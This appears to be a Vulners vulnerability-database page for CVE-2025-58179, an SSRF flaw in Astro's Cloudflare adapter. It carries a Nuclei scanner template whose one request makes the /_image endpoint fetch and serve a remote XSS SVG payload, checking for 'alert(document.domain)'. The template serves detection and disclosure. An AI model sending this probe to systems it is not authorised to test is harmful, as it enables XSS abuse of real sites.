| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| CVE-2026-41321 | 24 Apr 202617:04 | – | attackerkb | |
| CVE-2025-58179 | 4 Sep 202517:28 | – | circl | |
| Astro 代码问题漏洞 | 5 Sep 202500:00 | – | cnnvd | |
| CVE-2025-58179 | 4 Sep 202523:36 | – | cve | |
| CVE-2025-58179 Astro Cloudflare adapter is vulnerable to Server-Side Request Forgery via /_image endpoint | 4 Sep 202523:36 | – | cvelist | |
| EUVD-2025-26878 | 3 Oct 202520:07 | – | euvd | |
| EUVD-2025-36542 | 28 Oct 202519:54 | – | euvd | |
| EUVD-2026-25579 | 24 Apr 202617:04 | – | euvd | |
| Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter | 4 Sep 202519:24 | – | github | |
| CVE-2025-58179 | 5 Sep 202500:15 | – | nvd |
id: CVE-2025-58179
info:
name: Astro Cloudflare Adapter - Server Side Request Forgery
author: HoangAnhThai
severity: high
description: |
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
impact: |
Unauthenticated attackers can bypass third-party domain restrictions to serve arbitrary content from unauthorized domains through the image optimization endpoint, potentially enabling XSS attacks.
remediation: |
Upgrade Astro's @astrojs/cloudflare adapter to version 12.6.6 or later that properly validates image URLs.
reference:
- https://github.com/withastro/astro/commit/9ecf359
- https://github.com/advisories/GHSA-qpr4-c339-7vq8
- https://nvd.nist.gov/vuln/detail/CVE-2025-58179
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2025-58179
epss-score: 0.00773
epss-percentile: 0.51261
cwe-id: CWE-918
cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: withastro
product: astro
tags: cve,cve2025,ssrf,xss,astro,cloudflare,vuln,vkev
http:
- method: GET
path:
- "{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script type="text/javascript'
- 'alert(document.domain);'
condition: and
- type: word
part: content_type
words:
- "image/svg+xml"
- type: status
status:
- 200
# digest: 4a0a00473045022100e3e0ddcb2be7d0ef8bcff49713e0dbf22b67dad07e2bc6ad690645932122703a022035cebff5db856075f0c08c2c7b4f569a6664fe3ec6fdca67aef8f4bf6d6e89ac:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation